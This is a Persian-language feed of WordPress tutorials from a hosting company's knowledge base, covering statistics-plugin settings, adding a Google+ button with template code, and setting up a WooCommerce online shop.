تنظیمات استثنائات

با استفاده از این قسمت میتونید استثنائاتی که برای محاسبه کردن آمار در وردپرس وجود داره را مدیریت و شخصی سازی کنید. بیشترین مسئله‌ای که در این بخش اهمیت داره نقش‌های کاربری که در سایت لاگین کردند می‌باشد. بنابراین برای این منظور در این صفحه میتونید نقش‌های کاربری مثل مدیرکل، نویسنده، ویرایشگر و… که کار مدیریت روی سایت را دارند انتخاب کنید که بازدید این کاربران در آمار وردپرس محاسبه نشود. برای محاسبه آمار چنین کاربرانی میتونید گزینه Record exclusions را فعال کنید تا در یک جدول و تیبل جدا محاسبه و نمایش داده شوند.

محرومیت‌های آی‌پی/ربات: هم این امکان را میده تا آی‌پی یا ربات‌های خاصی را وارد کنید تا بازدید این نوع کاربران در روی آمار کلی وردپرس محاسبه نشوند.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

Excluded login page: با فعال کردن این گزینه امار بازدید در صفحات ورود، ثبت نام و فراموشی رمز عبور محاسبه نخواهد شد.

Excluded RSS feeds: با فعال کردن این گزینه صفحات فید وردپرس برای محاسبه بازدید در وردپرس غیرفعال خواهد شد.

Excluded 404 pages: با فعال کردن این گزینه صفحات 404 وردپرس در امار بازدید سایت محاسبه نخواهند شد.

Excluded AJAX calls: با فعال کردن این گزینه صفحاتی که به صورت آجاکس هستند در بازدید محاسبه نخواهند شد.

Excluded URLs list: در نهایت با استفاده از این فیلد هم میتونید آدرس‌های دلخواه سایت را وارد کنید تا در امار بازدید سایت وردپرس محاسبه نشوند. هر ادرس را در یک خط وارد کرده و آنها را با اینتر از هم جدا کنید.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

تنظیمات تعمیر و نگه‌داری

این بخش از تنظیمات افزونه آمار در وردپرس امکان حذف آمارهای تکراری یا پاک کردن آمار وردپرس در بازه زمانی خاصی را به شما خواهد داد. با فعال کردن پاکسازی اطلاعات روزانه قدیمی میتونید تعداد روز دلخواه را وارد کنید تا بعد از گذشت این تعداد کلیه امارها از افزونه آمار وردپرس حذف شوند. به عنوان مثال در تصویر بالا تعداد روز روی 365 روز تنظیم شده که بعد از گذشت این تعداد کلیه آمار در سایت حذف خواهند شد. با فعال کردن پاک کردن روزانه شمارش بازدیدکنندگان با کلیک بالا هم میتونید کاربرانی که بازدید روزانه زیادی را دارند را از آمار حذف کنید. به عنوان نمونه مشخص کنید کاربرانی که بیش از 50 بازدید از صفحات سایت در هر روز را دارند آمار مربوط به این کاربران از افزونه آمار وردپرس حذف شود.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

تنظیمات حذف افزونه آمار وردپرس

در صورتی که تصمیم گرفتید از افزونه آمار وردپرس استفاده نکنید حتما گزینه‌های این بخش را قبل از حذف یا غیرفعال کردن افزونه فعال کنید. از اونجایی که کلیه داده‌ها و آمار در افزونه آمار وردپرس در هاست و دیتابیس وردپرس پردازش میشه بنابراین بخشی از جداول وردپرس مربوط به این افزونه است. بنابراین سعی کنید حتما گزینه Remove data and settings را برای زمانی که قصد پاک کردن افزونه و استفاده کردن از این افزونه را ندارید فعال کنید تا داده‌ها و جداول از پایگاه داده وردپرس حذف شوند.


نمایش آمار بازدید در وردپرس

حالا که تنظیمات را ذخیره کردید به منوی آمار در افزونه امار وردپرس مراجعه کنید. مشابه تصویر زیر میبینید که آمار کاملی از سایت به همراه جزییات بازدید همراه با نمودار نمایش داده خواهد شد.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

همونطور که در تصویر میبینید آمار بازدید سایت در وردپرس به صورت روزانه به همراه نمودار نمایش داده شده است که در ان اطلاعاتی مثل موارد زیر قایل مشاهده و پیگیری است.

  • نمایش امار بازدید 20 روز گذشته در نمودار
  • نمایش بهترین کاربران بازدید کننده به همراه آی‌پی، مرورگر، سیستم عامل استفاده شده و تعداد بازدید وی از سایت در هر روز
  • نمایش تعداد کاربران ورودی از هر موتور جستجو به صورت نمودار متعلق به 20 روز گذشته
  • نمایش آخرین کلمات جستجو شده در موتورهای جستجو
  • نمایش آخرین بازدیدکنندگان در وردپرس به همراه اطلاعات صفحه در حال مشاهده، مرورگر، مکان کاربر روی نقشه و…
  • نمایش برترین ارجاع دهندگان به سایت
  • نمایش 10 برگه برتر و پربازدید در وردپرس
  • نمایش مروگر کاربران در قالب نمودار دایره‌ای
  • نمایش خلاصه بازدید در هر روز به صورت مرتب شده
  • و…

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

با مراجعه به منوی آمار بازدید هم میتونید آمار سایت را در بازه‌های زمانی مختلف بر اساس نمودار مشاهده کرده و با ابزاری که برای فیلتر تاریخ هم وجود داره میتونید آمار بازدید سایت را در بازه زمانی دلخواهی ببینید.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

با مراجعه به منوی آنلاین هم میتونید کاربران حاضر در سایت را به همراه جزییات کاملی مثل مرورگر، مکان کاربر، صفحه‌ای که کاربر در اون قرار داره و… را مشاهده کنید.

به همین ترتیب میتونید با مراجعه به سایر منوها مثل ارجاع دهنده‌ها، کلمات جستجو شده، برترین کلمات جستجو شده، موتورهای جستجو، برگه‌ها، بازدیدکنندگان، دسته‌بندی‌ها، برچسب‌ها، نویسنده‌ها، مرورگرها و برترین بازدیدکنندگان را به همراه جزییات کامل اونها مشاهده کنید.

نمایش آمار بازدید سایت در وردپرس

افزونه آمار وردپرس برای نمایش امار در سایت هم کاربرد داشته و صرفا محدود به نمایش آمار وردپرس در پیشخوان وردپرس نیست. با استفاده از ابزارک این افزونه میتونید اقدام به نمایش آمار بازدید در سایت بکنید. برای این کار مشابه تصویر زیر به منوی نمایش> ابزارک‌ها مراجعه کرده و سپس روی ابزارک آمار که با نصب این افزونه به سایت اضافه شده کلیک کرده و اونو به بخش دلخواه قالب خودتون اضافه کنید.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

حالا همانطور که در تصویر میبینید گزینه‌هایی که قصد دارید در آمار وردپرس نمایش داده شوند را انتخاب کرده و روی دکمه ذخیره ابزارک کلیک کنید. در نهایت بعد از قرار گرفتن ابزارک وردپرس در قالب سایت مشابه تصویر زیر آخرین امار سایت نمایش داده خواهند شد.

نمایش آمار سایت در وردپرس با افزونه آمار وردپرس فارسی

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید نسبت به نمایش آمار در وردپرس اقدام کنید. در صورتی که برای استفاده از افزونه آمار در وردپرس سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش نمایش آمار سایت در وردپرس اولین بار در پدیدار شد.

آموزش افزودن دکمه گوگل پلاس به وردپرس

$
0
0

افزودن دکمه گوگل پلاس به وردپرس کمک می‌کند تا مطالب سایت بهتر در موتورهای جستجو ایندکس شوند. در اینکه آیا اشتراک گذاری و امتیاز دادن به نوشته‌ها در گوگل پلاس نسبت به سایر شبکه‌های اجتماعی بیشتر برای موتور جستجو گوگل اهمیت دارد هنوز نظر قطعی وجود ندارد. اما برخی افراد متخصص در حوزه سئو بر اساس شواهد و تجربه بر این باور هستند که استفاده از گوگل پلاس برای سایت می‌تواند یک امتیاز مثبت به حساب آمده و در ایندکس سریع‌تر مطالب در موتور جستجو و کسب رتبه دخیل باشد.

در این آموزش از پایگاه داده میزبان‌فا قصد دارم به معرفی نحوه اضافه کردن دکمه گوگل پلاس به وردپرس بپردازم که با استفاده از این افزونه میتونید دکمه دادن امتیاز به نوشته را با استفاده از گوگل پلاس در وردپرس فراهم کرده و به ایندکس سریع‌تر مطالب در گوگل کمک کنید. در صورتی که شما هم به دنبال راه‌هایی برای گرفتن امتیاز بیشتر در گوگل هستید تا انتهای این مقاله با ما همراه باشید.

آموزش افزودن دکمه گوگل پلاس به وردپرس

برای اضافه کردن دکمه گوگل پلاس به مطالب وردپرس ابتدا باید کتابخانه جاوا اسکریپت گوگل پلاس را در سایت خودتون فراخوانی کنید. بنابراین برای این کار وارد هاست خود شده و روی دکمه File Manager کلیک کنید تا به صفحه مدیریت فایل‌ها در هاست هدایت شوید.

آموزش افزودن دکمه گوگل پلاس به وردپرس

سپس به مسیر /public_html/wp-content/themes/ مراجعه کرده و پوشه قالب فعالی که در حال حاضر از اون استفاده می‌کنید را باز کنید. حالا در پوشه قالب خودتون به دنبال فایلی با نام footer.php بگردید. حالا روی فایل راست کلیک کرده و گزینه Edit را برای ویرایش فایل انتخاب کنید و کدهای زیر را در مکان مناسبی از این فایل قرار دهید.

<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>

با افزودن کد بالا در فایل فوتر وردپرس کتابخانه جاوا اسکریپت گوگل پلاس در سایت فراخوانی شده و حالا کافیه تا در هر بخش از سایت که قصد دارید دکمه امتیاز 1+ گوگل پلاس نمایش داده بشه کد مورد نظر خودتون را اضافه کنید. در صورتی که قالب شما فاقد فایل footer.php هست میتونید کدهای زیر را در فایل فانکشن قالب(functions.php) اضافه کنید.

function add_googleplusone() {
echo '<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>';
}
add_action('wp_footer', 'add_googleplusone');

برای اضافه کردن دکمه امتیاز دادن گوگل پلاس در وردپرس برای مطالب سایت باید فایل single.php قالب خودتون را ویرایش کرده و کدها را در اون قرار بدین. بنابراین در همون پوشه قالب داخل هاست فایل single.php را باز کرده و کدهای زیر را در مکان مناسبی از فایل قرار دهید.

//اندازه بزرگ
<g:plusone size="tall" href="<?php the_permalink(); ?>"></g:plusone>
 
//اندازه استاندارد
<g:plusone href="<?php the_permalink(); ?>"></g:plusone>
 
//اندازه متوسط
<g:plusone size="medium" href="<?php the_permalink(); ?>"></g:plusone>
 
//اندازه کوچک
<g:plusone size="small" href="<?php the_permalink(); ?>"></g:plusone>

همونطور که در کدهای بالا میبینید بسته به نیاز خودتون یکی از اندازه‌های دلخواه را برای نمایش دکمه امتیاز گوگل پلاس در وردپرس انتخاب کنید و در این فایل قرار دهید. خواهید دید که مشابه تصویر زیر دکمه دادن امتیاز نمایش داده خواهد شد.

آموزش افزودن دکمه گوگل پلاس به وردپرس

افزودن دکمه گوگل پلاس شناور در وردپرس

یکی دیگه از نیازهایی که کاربران برای اضافه کردن دکمه گوگل پلاس در وردپرس دارند اینه که چطور میشه دکمه گوگل پلاس در وردپرس را به صورت شناور در گوشه تمامی صفحات سایت نمایش داد. برای این منظور هم کافیه تا قطعه کد زیر را در فایل فوتر قرار بدین تا دکمه امتیاز دادن در گوگل پلاس برای وردپرس به صورت شناور در گوشه سایت نمایش داده شود.

<div style="position:fixed; left:20px; bottom:10px;"><g:plusone size="tall"></g:plusone></div>

با قرار دادن قطعه کد زیر در فایل فوتر یا هدر سایت دکمه گوگل پلاس در گوشه سمت چپ پایین صفحه نمایش داده خواهد شد. با استفاده از کدهای موجود در بخش style می‌تونید به کمک CSS مکان دلخواه خودتون را برای نمایش دکمه شناور گوگل پلاس در وردپرس وارد کنید.

به صورت پیشفرض کدهای نمایش دکمه گوگل پلاس در وردپرس تعداد امتیاز ثبت شده برای مطالب را نمایش می‌دهند. بنابراین اگر مایل بودید امتیاز ثبت شده برای هر نوشته را نمایش ندهید کافیه کد count=“false” را هم به اونها اضافه کنید. به عنوان مثال برای دکمه در اندازه متوسط بدون نمایش تعداد امتیاز می‌تونید از کد زیر استفاده کنید.

<g:plusone size="medium" count="false" href="<?php the_permalink(); ?>"></g:plusone>

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از این آموزش تونسته باشید نسبت به نمایش دکمه امتیاز دادن گوگل پلاس در وردپرس و همچنین نمایش دکمه شناور گوگل پلاس در وردپرس اقدام کنید. در صورتی که برای استفاده از کدهای معرفی شده در این آموزش سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش افزودن دکمه گوگل پلاس به وردپرس اولین بار در پدیدار شد.

آموزش راه اندازی فروشگاه اینترنتی با وردپرس

$
0
0

تا به حال شده به موضوع راه اندازی فروشگاه اینترنتی با وردپرس یا هر سیستم مدیریت محتوای دیگه فکر کنید؟ به نظر شما ساخت یک فروشگاه اینترنتی چقدر میتونه هزینه داشته باشه؟ اصلا چرا باید یک فروشگاه اینترنتی راه اندازی کنیم؟ آیا ساخت سایت فروشگاه اینترنتی با وردپرس میتونه روی فروش بیشتر محصولات ما تاثیرگذار باشه و درآمد خودمون را برای خدماتی که ارائه می‌کنیم بیشتر بکنه؟ هیچ میدونستید که با ساخت یک فروشگاه اینترنتی میتونید علاوه بر مشتریان محلی که در شهر خودتون هستند مشتریان بسیار زیادی را در سطح کشور جذب کنید؟ و کلی سوالات از این دست که قبل از راه اندازی یک فروشگاه اینترنتی بهش فکر می‌کنید، به نظرتون پاسخ این سوالات چه چیزی میتونه باشه؟

در این مقاله از پایگاه دانش میزبان‌فا قصد دارم به آموزش راه اندازی فروشگاه اینترنتی با وردپرس بپردازم و پاسخ تمام سوالاتی که در بالا مطرح شده را با هم دیگه مورد بررسی قرار بدیم. در این آموزش از سایخت سایت فروشگاهی قصد دارم به نحوه ساخت فروشگاه با ووکامرس بپردازم، اما قبل از اینکه به موضوع ساخت فروشگاه اینترنتی با وردپرس و ووکامرس بپردازیم لازمه پاسخ برخی سوالاتی که برای ساخت فروشگاه اینترنتی ممکنه با اون مواجه بشید بپردازم.

مزایای راه اندازی فروشگاه اینترنتی با وردپرس

ساخت فروشگاه اینترنتی با وردپرس امکان صرفه جویی در هزینه‌ها را برای شما به دنبال خواهد داشت. سیستم مدیریت محتوای وردپرس به دلیل گستردگی و تنوع در قالب وردپرس و افزونه وردپرس که داره میتونه دست شما را برای ساخت هر نوع فروشگاه اینترنتی چه برای فروش محصولات فیزیکی و چه دانلودی بازتر بزاره. بنابراین برای اینکه با مزایای ساخت سایت با ووکامرس بیشتر آشنا بشید یک چک لیست از این مزایا را تهیه می‌کنیم.

  • هزینه کم در مقایسه با سایر سیستم‌ها: ساخت سایت با وردپرس و ووکامرس که هر دو به صورت رایگان عرضه شدند هزینه کمتری در مقایسه با سایر سیستم‌های فروشگاهی مثل پرستاشاپ خواهد داشت.
  • گستردگی در قالب ووکامرس: سایت‌ها و فروشگاه‌های قالب وردپرس بسیار زیادی وجود دارند که به صورت رایگان و تجاری انواع قالب ووکامرس مطابق با تکنولوژی و نیاز روز طراحی می‌کنند.
  • گستردگی در افزونه‌های ووکامرس: سایت‌ها و فروشگاه‌های افزونه وردپرس نیز نیاز کاربران را برای افزودن امکانات به ووکامرس مورد بررسی قرار داده و اقدام به طراحی افزونه رایگان و تجاری برای رفع این نیازها می‌کنند.
  • امکان گزارش‌گیری کامل از فروش: با استفاده از ووکامرس می‌توانید گزارش کاملی از فروش محصولات خود را داشته باشید و از آنها در بازه‌های زمانی مختلف گزارش تهیه کرده و با مطالعه و تجزیه و تحلیل داده‌ها برنامه ریزی تبلیغاتی برای فروش محصولات داشته باشید.
  • فروش اتوماتیک بدون طی مراحل گوناگون: با ساخت سایت فروشگاه اینترنتی دیگر نیازی به حضور فیزیکی در مکان تجاری خود ندارید و می‌توانید به راحتی حتی در رختخواب خود به مدیریت فروشگاه بپردازید 😀 .
  • گستردگی در جذب مشتری در سطح وسیع: با راه اندازی فروشگاه اینترنتی دیگر محدود به موقعیت محلی و شهر خود نبوده و می توانید محصولات خود را در سطح وسیع‌تری به مشتریان عرضه کنید. این سطح وسیع می‌تواند به صورت جهانی نیز باشد.
  • امکان بازاریابی و تبلیغ محصولات به روش‌های گوناگون و کم هزینه: امروزه تمرکز بر روی سئو و بهینه سازی سایت برای موتورهای جستجو بهترین روش تبلیغات کم هزینه است که با برنامه ریزی درست و زمان‌بندی شده میتونید بدون صرف هزینه‌های چند ده میلیونی از طریق موتورهای جستجو مشتریان خود را جذب کنید.

فروشگاه اینترنتی یا فروش با شبکه‌های اجتماعی؟

بسیاری از صاحبان کسب و کار تا همین هفته‌های اخیر از پلتفرم‌هایی مثل تلگرام و اینستاگرام برای فروش محصولات به صورت اینترنتی استفاده می‌کردند. اما بعد از ایجاد محدودیت‌هایی که روی تلگرام رخ داد به طور کلی فضای کسب و کارهایی که از تلگرام برای فروش محصولات اینترنتی خود استفاده می‌کردند متضرر شد. پیش از این هم این اتفاق در یک بازه زمانی در دی ماه رخ داده بود.

تصوری که برخی افراد برای ساخت فروشگاه اینترنتی دارند این است که کارهای مدیریتی را به اشتباه به گونه‌ای بزرگ در نظر می‌گیرند که حتی دوست ندارند به ساخت سایت هم فکر کنند. اما به این نکته که سرمایه گذاری روی شبکه های اجتماعی برای فروش محصولات کاملا اشتباه است نیز اصلا فکر نمی‌کنند. در همین مسئله‌ای که برای تلگرام رخ داده، نه تنها فروش محصولات به نوعی نیمه سنتی است بلکه فرآیند خرید نیز در آن طولانی می‌شود. اما وقتی از یک سایت استفاده کنید تنها کاری که باید انجام دهید این است که سفارشات را مشاهده کرده و بعد از آماده شدن برای مشتری ارسال کنید.

اما در یک شبکه اجتماعی ابتدا باید به صورت مستقیم با مشتری مکاتبه کنید. سپس از ابتدا جزییات یک محصول را برای تک تک مشتریان شرح دهید و در این بین هم به سوالات بی نهایتی که تمامی ندارند یک به یک پاسخ دهید تا مشتری از محصولی که قصد خرید دارد اطلاعات کافی به دست آورد. بعد از اینکه تصمیم به خرید گرفت از راه‌هایی مثل کارت به کارت کردن و یا استفاده از صفحات پرداخت واسط از مشتری بخواهید تا رسید پرداخت را به شما اعلام کرده و در نهایت محصول را پس از تاییدیه پرداخت برای وی ارسال کنید.

اما در یک فروشگاه اینترنتی کلیه این کارها به صورت اتوماتیک و بدون نیاز به اینکه به یک یک مشتریان پاسخ دهید قابل پیش بینی و برطرف کردن است. کافی است در توضیحات محصول بخشی را هم برای سوالات متداول در نظر بگیرید. سپس پاسخ تمامی سوالات متداول را به صورت آماده قرار دهید تا مشتری آنها را مطالعه کرده و با یک دید باز از محصول اقدام به خرید کند. با به وجود آمدن سوالات جدید هم میتوانید این بخش را آپدیت کرده و سوالات دیگری را نیز به آن اضافه کنید. فرآیند پرداخت نیز کاملا اتوماتیک بوده و بعد از اینکه پرداخت انجام شود نتیجه آن در سفارشات فروشگاه اینترنتی قابل مشاهده خواهد بود.

به دلیل اینکه بحث روی فروش محصولات از طریق سایت و شبکه‌های اجتماعی یک مقاله پر محتوا و غنی را می‌طلبد در اینجا صرفا به معرفی برخی مزایای ساخت فروشگاه اینترنتی با سایت در مقایسه با شبکه اجتماعی پرداختم. در مقالات آتی حتما یک مقاله جامع برای مقایسه سایت با فروشگاه اینترنتی گردآوری خواهم کرد.

ساخت انواع فروشگاه اینترنتی با وردپرس

فروشگاه اینترنتی با وردپرس می‌تواند شامل دو نوع فروشگاه باشد که عبارتند از:

  1. ساخت فروشگاه اینترنتی برای فروش محصولات فیزیکی: با ساخت فروشگاه فیزیکی می‌توانید محصولات فیزیکی خود را از طریق شرکت‌هایی نظیر پست در کوتاه‌ترین زمان ممکن به دست مشتری برسانید. حتی می‌توانید با گسترش کسب و کار خود و رونق دادن به آن در سطح وسیع از تحویل اکسپرس اختصاصی شرکت خود استفاده کنید تا رضایت مشتریان را بیشتر کنید.
  2. ساخت فروشگاه اینترنتی برای فروش محصولات دانلودی: با ساخت فروشگاه محصولات دانلودی یا مجازی هم می‌توانید محصولاتی که جنبه دانلودی دارند را در سایت قرار داده و به تعداد نامحدود و بدون نیاز به امکانات استفاده از ارسال فیزیکی محصولات به مشتریان عرضه کنید. این نوع محصولات می‌توانند شامل دوره‌های آموزشی، فایل‌های قالب و افزونه سایت سازها و هر نوع فایل مثل پروژه‌های دانشجویی و… باشند.
امروزه فروش محصولات دانلودی و مجازی هم به همان میزان محصولات فیزیکی از اهمیت بالایی برخوردار شده‌اند. به گونه‌ای که بسیاری از فروشگاه‌های اینترنتی اقدام به فراهم کردن قابلیتی برای ساخت فروشگاه محصولات دانلودی کرده‌اند که کاربران می‌توانند با ثبت نام در این فروشگاه‌ها و درج محصولات دانلودی خود اقدام به کسب درآمد از اینترنت بکنند. در مقاله معرفی برترین وب سایت های ایرانی ساخته شده با وردپرس به معرفی برخی فروشگاه‌های اینترنتی مثل ژاکت و راست چین که امکان فروش محصولات را به کاربران می‌دهند پرداختیم.

قدم اول: انتخاب دامنه

اولین قدم برای ساخت سایت فروشگاه اینترنتی با وردپرس انتخاب دامنه و خرید یک دامنه مناسب برای کسب و کار شما می‌باشد. در ویدئو زیر به معرفی اینکه دامنه چیست پرداخته شده است.

حالا که متوجه شدید دامنه چیست باید یک دامنه خوب برای فروشگاه اینترنتی خودتون ثبت کنید. به طوری که این نام دامنه معرف کسب و کار شما باشه و به راحتی برای دیگران هم قابل فهم و به خاطر سپردن باشه. بنابراین در ویدئو زیر به نحوه انتخاب نام مناسب برای دامنه پرداختیم.

دامنه‌ای که برای فروشگاه اینترنتی خودتون تهیه می‌کنید باید معرف کسب و کار شما باشه و به گونه‌ای باشه که هر کسی که نام دامنه را وارد کرد و یا دامنه خودتون را بهش معرفی کردید متوجه این مسئله بشه که شما یک فروشگاه اینترنتی راه‌اندازی کردید. همچنین دامنه خریداری شده باید ساده و قابل فهم باشه و به راحتی در خاطر مشتریان باقی بمونه.

قدم دوم: خرید هاست

برای اینکه سایت شما در فضای اینترنت از طریق دامنه قابل دسترسی باشه نیاز به یک فضا برای ذخیره داده‌ها و اطلاعات سایت خواهید بود. به این فضا هاست می‌گویند. در ویدئو زیر به معرفی هاست پرداختیم که یک هاست چیست؟

اما در انتخاب و خرید هاست باید بدونید که هر هاستی مناسب شما نیست و باید هاستی خریداری کنید که از قدرت و کیفیت بالایی برخوردار بوده و پاسخگوی نیاز شما برای یک فروشگاه اینترنتی باشد. در ویدئو زیر به معرفی نحوه انتخاب هاست مناسب پرداختیم.

برخی افراد که به تازگی اقدام به ساخت سایت می‌کنند همیشه به دنبال این هستند که از هاست رایگان استفاده کنند. اگر شما هم به دنبال چنین مسائلی هستید پیشنهاد می‌کنم حتما مقاله مزایا و معایب استفاده از هاست رایگان را مطالعه کرده و یک تصمیم درست برای این کار بگیرید.

قدم سوم: نصب و راه‌اندازی وردپرس

بعد از اینکه هاست و دامنه خودتون رو تهیه کردید و دامنه و هاست نهایتا بعد از گذشت 72 ساعت به همدیگه متصل شدند باید شروع به نصب وردپرس بکنید. بسته به اینکه اقدام به خرید هاست سی پنل یا دایرکت ادمین کرده باشید مراحل نصب وردپرس متفاوت خواهند بود. اما در کل مراحلی که باید برای نصب طی کنید یکسان هستند و تنها تفاوت در نوع کنترل پنل هاست سی پنل و دایرکت ادمین هست که با محیط گرافیکی مختلفی هستند. پیش از این به نحوه نصب و راه اندازی وردپرس روی هاست پرداختیم که میتونید بر اساس این مقالات آموزشی اقدام به نصب وردپرس بکنید.

اما یک راه دیگه هم برای نصب وردپرس روی هاست وجود داره که اگر از قبل با استفاده از لوکال هاست اقدام به طراحی سایت روی رایانه شخصی خودتون کرده باشید میتونید به راحتی سایت طراحی شده در لوکال هاست را به هاست سی پنل یا دایرکت ادمین خریداری شده منتقل کنید. برای این حالت هم میتونید از مقالات پیشین میزبان‌فا برای انتقال وردپرس استفاده کنید.

بعد از اینکه وردپرس را نصب کردید باید اقدام به تهیه یک قالب مناسب فروشگاه اینترنتی بکنید که امکان پشتیبانی از فروشگاه ساز ووکامرس برای ساخت سایت را هم داشته باشه. در انتخاب قالب مناسب سایت فروشگاهی میتونید وبسایت مرتبط با کسب و کار خودتون را بررسی کرده و ببینید که شما هم برای ساخت یک فروشگاه اینترنتی در همین زمینه نیاز به چه امکانات و چه رابط کاربری در قالب خواهید داشت. سپس بر همین اساس قالب شیک و در خور یک فروشگاه اینترنتی که از ووکامرس هم پشتیبانی می‌کنه و در بهترین سرعت ممکن قابل دسترسی هست بکنید.

قدم چهارم: نصب و راه‌اندازی ووکامرس

افزونه فروشگاه ساز ووکامرس امکان ساخت فروشگاه اینترنتی با وردپرس را به شما خواهد داد که با استفاده از ووکامرس می‌توانید امکان فروش هر نوع محصول فیزیکی و دانلودی را در وردپرس فراهم کنید. برای نصب ووکامرس می‌توانید از مقاله آموزش نصب ووکامرس در وردپرس استفاده کنید. بعد از اینکه ووکامرس را در وردپرس راه اندازی کرده و تنظیمات ووکامرس فروشگاه خود را سفارشی سازی کردید برای اینکه امکان پرداخت اینترنتی را در فروشگاه اینترنتی خود فراهم کنید باید اقدام به تهیه یک درگاه پرداخت بکنید.

برای استفاده از درگاه پرداخت اینترنتی دو راه دارید که عبارتند از:

  1. استفاده از درگاه پرداخت اینترنتی مستقیم: در این نوع درگاه‌ها مستقیما با شرکت‌های پرداخت اینترنتی همچون به‌پرداخت ملت، سامان کیش و… عقد قرارداد کرده و میتوانید از امکان استفاده از درگاه پرداخت مستقیم در فروشگاه اینترنتی خود برخوردار شوید. برای گرفتن درگاه پرداخت مستقیم نیاز به نماد اعتماد الکترونیک یا همان ای‌نماد دارید.
  2. استفاده از درگاه پرداخت اینترنتی واسط: در صورتی که امکان دریافت ای‌نماد برای سایت را ندارید می‌توانید از درگاه پرداخت‌های واسط برای این کار استفاده کنید. در درگاه پرداخت واسط تنها کاری که باید انجام دهید ثبت نام در سایت و ارسال مدارک تایید هویتی است. بعد از اینکه هویت شما تایید شد می‌توانید آدرس سایت خود را برای اخذ درگاه ثبت کرده و منتظر تاییدیه بمانید تا کد API درگاه مخصوص دامنه شما در اختیارتان قرار گیرد. درگاه پرداخت‌هایی مثل زرین پال و pay.ir از پرطرفدارترین درگاه‌های واسط هستند.

حالا که نوع درگاه پرداخت اینترنتی خودتون را برای ساخت سایت فروشگاهی انتخاب کردید باید افزونه درگاه پرداخت مربوط به درگاه اینترنتی ووکامرس مخصوص درگاه پرداخت مورد نظر را در ووکامرس نصب کنید. در مقاله معرفی افزونه‌های درگاه پرداخت ووکامرس به معرفی برخی از درگاه‌های پرداخت پر کاربرد در ووکامرس پرداختیم که می‌توانید از آنها برای امکان استفاده از پرداخت هزینه محصولات استفاده کنید.

بعد از نهایی شدن تنظیمات ووکامرس و درگاه پرداخت کافی است شروع به درج محصولات در فروشگاه اینترنتی خودتون بکنید. برای نحوه افزودن محصولات در ووکامرس هم میتونید از مقاله آموزش مدیریت محصولات در ووکامرس استفاده کنید. امکان گزارش گیری از فروش محصولات در بازه‌های زمانی مختلف، خروجی گرفتن از گزارشات، امکان دسته بندی و برچسب گذاری روی محصولات، امکان استفاده از انواع فایل چندرسانه‌ای برای معرفی محصول و… بخشی از امکاناتی هستند که با ساخت فروشگاه در وردپرس می‌توانید از آنها استفاده کنید.

ساخت فروشگاه اینترنتی با ووکامرس

برای افزودن امکانات بیشتر به ووکامرس هم بسته به نیاز خودتون میتونید از مقالات ووکامرس که در پایگاه دانش میزبان‌فا معرفی میشوند استفاده کنید.

مشاهده مقالات آموزشی ووکامرس

قدم پنجم: سئو ووکامرس و تمرکز روی فروش بیشتر

حالا که مراحل چهارگانه برای ساخت فروشگاه اینترنتی را طی کردید وقت اون رسیده تا بر روی فروشگاه اینترنتی خودتون نظارت درست و با برنامه صحیح را تنظیم کنید و تنها تمرکزی که می‌کنید روی فروش بیشتر محصولات باشد. اولین قدم در این راه سئو و بهینه سازی محتوای محصولات ووکامرس است. سعی کنید توضیحات محصولات را طوری بنویسید که مشتریان ضمن اینکه اطلاعات درستی از محصول به دست می‌آورند، روی آنها تاثیر گذار بوده و ترغیب به خرید محصول از فروشگاه اینترنتی شما شوند. برای سئو فروشگاه ووکامرسی خودتون باید یک برنامه درست داشته باشید و تمام تلاشتون را بکنید که صفحات محصولات در کلمات کلیدی که جستجو می‌شوند در نتایج بالای گوگل قرار گیرند. برای اینکه در صدر نتایج قرار بگیرید می تونید از پیشنهادات زیر استفاده کنید.

  1. جزییات و مشخصات کامل محصول را منتشر کنید.
  2. در صفحه معرفی محصول از انواع ویدئو، اینفوگرافیک و… برای معرفی محصول استفاده کنید.
  3. امکان نقد و بررسی محصولات را برای مشتریان و کاربرانی که قصد خرید دارند فراهم کنید.
  4. در کنار فروشگاه خود مطالبی را در رابطه با نقد و بررسی دقیق محصولات خود تهیه کنید و در نهایت در انتهای مقاله دکمه‌ای برای خرید محصول از فروشگاه خودتان قرار داده و آن را به صفحه محصول لینک کنید.
  5. برای اینکه بدانید مشتریان شما از چه بخش‌هایی وارد سایت می‌شوند و چند درصد از کاربران اقدام به خرید می‌کنند حتما از یک مشاور و بازاریاب کمک بگیرید تا با بررسی داده‌ها و میزان فروش بهترین پیشنهادات را برای فروش بیشتر به شما ارائه دهد.
  6. ارائه کدهای تخفیف به مشتریان به مناسبت‌های مختلف
  7. فراهم کردن امکان تحویل رایگان در شرایطی مثل تحویل در شهر خود یا تحویل رایگان محصولات به مناسبت‌های مختلف یا تحویل رایگان به شرط خریدهای بالای X تومان
  8. و سایر استراتژی‌هایی که برای افزایش فروش با انتخاب یک مشاور می‌توانید از آنها استفاده کنید.

امیدوارم که این آموزش هم مورد توجه شما قرار گرفته باشه و با استفاده از این مقاله تونسته باشید اقدام به ساخت فروشگاه اینترنتی با وردپرس بکنید و از مزایایی که یک فروشگاه اینترنتی میتونه برای کسب و کار شما به ارمغان بیاره به خوبی آگاه شده باشید. در صورتی که هر سوالی پیرامون ساخت فروشگاه اینترنتی داشتید در بخش دیدگاه‌ها مطرح کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش راه اندازی فروشگاه اینترنتی با وردپرس اولین بار در پدیدار شد.

آموزش رفع مشکل ارسال ایمیل در لوکال هاست وردپرس

$
0
0

